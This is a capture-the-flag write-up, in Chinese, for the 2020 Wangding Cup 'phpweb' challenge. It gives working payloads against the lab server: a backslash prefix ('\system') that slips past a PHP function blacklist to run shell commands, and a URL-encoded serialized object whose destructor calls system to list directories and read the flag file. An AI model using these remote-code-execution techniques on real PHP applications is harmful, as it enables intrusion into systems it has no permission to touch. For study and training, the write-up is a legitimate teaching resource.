目錄

方法一：

方法二：

---

?

知識(shí)點(diǎn)：

1）黑名單取巧繞過(guò)

2）PHP的file_get_contents函數(shù)使用

3）PHP序列化與反序列化構(gòu)造

訪(fǎng)問(wèn)靶機(jī)，觀察頁(yè)面，開(kāi)始時(shí)首先加載了一張圖片，隨后刷新回顯時(shí)間，并且網(wǎng)頁(yè)每隔一段時(shí)間會(huì)刷新一次，頻率大概五秒一次

F12查看源碼，和觀察的一樣，setTimeout("document.form1.submit()",5000)每隔五秒鐘將會(huì)提交一次form1，然后是一串時(shí)間字符串2021-10-20 12:14:50 pm

注意：重點(diǎn)是靶機(jī)內(nèi)的form1表單，index.php用post方式提交了兩個(gè)參數(shù)，func和p。func的值為date，p值Y-m-d h:i:s a

分析：接收到func和p，執(zhí)行PHP內(nèi)的date函數(shù)和格式化的Y-m-d h:i:s a，然后輸出結(jié)果。既然這樣，猜想一下在PHP內(nèi)，執(zhí)行$func="date"，肯定是沒(méi)有問(wèn)題的，但是如果提交的不是date，而是system，或exec呢？

不妨用php內(nèi)的md5函數(shù)測(cè)試一下，123經(jīng)過(guò)md5加密后的值為202cb962ac59075b964b07152d234b70，如果成功執(zhí)行回顯在網(wǎng)頁(yè)上，猜測(cè)就正確

構(gòu)造測(cè)試paylaod：?func=md5&p=123

做個(gè)代碼執(zhí)行？被攔截了，可以fuzz查看哪些函數(shù)被黑名單

這里可以利用file_get_contents獲取index.php的源碼，如下：

file_get_contents(path):讀取path路徑下文件的內(nèi)容

果然定義了一個(gè)disable_fun，然后巴拉巴拉一堆黑名單，代碼審計(jì)

<?php$disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk", "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");function gettime($func, $p) {$result = call_user_func($func, $p);//調(diào)調(diào)用傳遞函數(shù)，并返回函數(shù)運(yùn)行的結(jié)果（本例中即為執(zhí)行$func($p)）$a= gettype($result);if ($a == "string") {return $result;} else {return "";}}class Test {var $p = "Y-m-d h:i:s a";var $func = "date";function __destruct() {if ($this->func != "") {echo gettime($this->func, $this->p);}}}$func = $_REQUEST["func"];$p = $_REQUEST["p"];if ($func != null) {//非空$func = strtolower($func);//轉(zhuǎn)小寫(xiě)if (!in_array($func,$disable_fun)) {//判斷是否存在黑名單echo gettime($func, $p);//如果不存在則調(diào)用gettime，把funchep傳入}else {die("Hacker...");//報(bào)錯(cuò)}}?>

這里有兩種解法，一種是像大部分wp一樣構(gòu)造序列化得flag，出題人大概也是這個(gè)意圖，另外一種解法比較巧取

方法一：

首先判斷是否存在與黑名單，php內(nèi)的" \ "在做代碼執(zhí)行的時(shí)候，會(huì)識(shí)別特殊字符串，繞過(guò)黑名單

payload：?func=\system&p=ls /

常用命令：

system('ls') : 列舉當(dāng)前目錄下的所有文件

system("find / -name flag")：查找所有文件名匹配flag的文件

payload：?func=\system&p=find / -name flag*

payload：?func=\system&p=cat /tmp/flagoefiu4r93

方法二：

這種方法就是大部分答案寫(xiě)的反序列化得flag手段

首先看下剛才index.php源碼內(nèi)的一串代碼

class Test {
? ? ?? var $p = "Y-m-d h:i:s a";//定義p和func
? ? ?? var $func = "date";
? ? ?? function __destruct() {//對(duì)象被創(chuàng)建時(shí)自動(dòng)調(diào)用
? ? ? ? ?? if ($this->func != "") {
? ? ? ? ? ? ?? echo gettime($this->func, $this->p);
? ? ? ? ?? }
}

如果用反序列化的方式調(diào)用system呢，提交的func為unserialize，p為序列化后的字符串，然后反序列化test類(lèi)

<?php ? class Test{ public $func; public $p; } ? $ganyu=new Test(); $ganyu->func="system"; $ganyu->p="ls -alh /"; ? echo urlencode(serialize($ganyu)); ?>

構(gòu)造查看根目錄的payload，由于以p提交的為序列化內(nèi)容，func需設(shè)置為unserialize：

?func=unserialize&p=O%3A4%3A%22Test%22%3A2%3A%7Bs%3A4%3A%22func%22%3Bs%3A6%3A%22system%22%3Bs%3A1%3A%22p%22%3Bs%3A9%3A%22ls+-alh+%2F%22%3B%7D

然后就是構(gòu)造查找flag文件的payload

<?phpclass Test{ public $func; public $p; }$ganyu=new Test(); $ganyu->func="system"; $ganyu->p="find / -name flag*";echo urlencode(serialize($ganyu)); ?>

最后構(gòu)造查詢(xún)flag的payload得到flag

<?phpclass Test{ public $func; public $p; }$ganyu=new Test(); $ganyu->func="system"; $ganyu->p="cat /tmp/flagoefiu4r93";echo urlencode(serialize($ganyu)); ?>

?func=unserialize&p=O%3A4%3A%22Test%22%3A2%3A%7Bs%3A4%3A%22func%22%3Bs%3A6%3A%22system%22%3Bs%3A1%3A%22p%22%3Bs%3A22%3A%22cat+%2Ftmp%2Fflagoefiu4r93%22%3B%7D

總結(jié)

以上是生活随笔為你收集整理的[网鼎杯 2020 朱雀组]之phpweb两种不同的解题方式的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。